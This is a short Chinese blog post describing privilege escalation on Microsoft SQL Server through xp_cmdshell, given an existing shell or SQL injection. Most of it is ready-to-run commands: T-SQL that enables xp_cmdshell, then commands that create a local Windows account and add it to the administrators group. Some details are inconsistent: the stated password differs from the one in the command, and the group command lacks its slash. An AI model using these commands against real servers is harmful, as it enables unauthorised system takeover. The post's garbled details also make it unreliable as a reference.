MSSQL提权之xp_cmdshell
0x01 前提
- 
getshell或者存在sql注入并且能够执行命令。 
- 
sql server是system权限,sql server默认就是system权限。 
0x02 xp_cmdshell
有了xp_cmdshell的话可以执行系统命令,该组件默认是关闭的,因此需要把它打开。
开启xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell',1;reconfigure;
关闭xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell', 0;reconfigure
0x03 提权
exec master..xp_cmdshell 'net user test pinohd123. /add' 添加用户test,密码test exec master..xp_cmdshell 'net localgroup administrators test add' 添加test用户到管理员组
 
静有所思,思有所想 
------------------------------------------------------------------------------------
mail: 779783493@qq.com

 
                
            
         
         浙公网安备 33010602011771号
浙公网安备 33010602011771号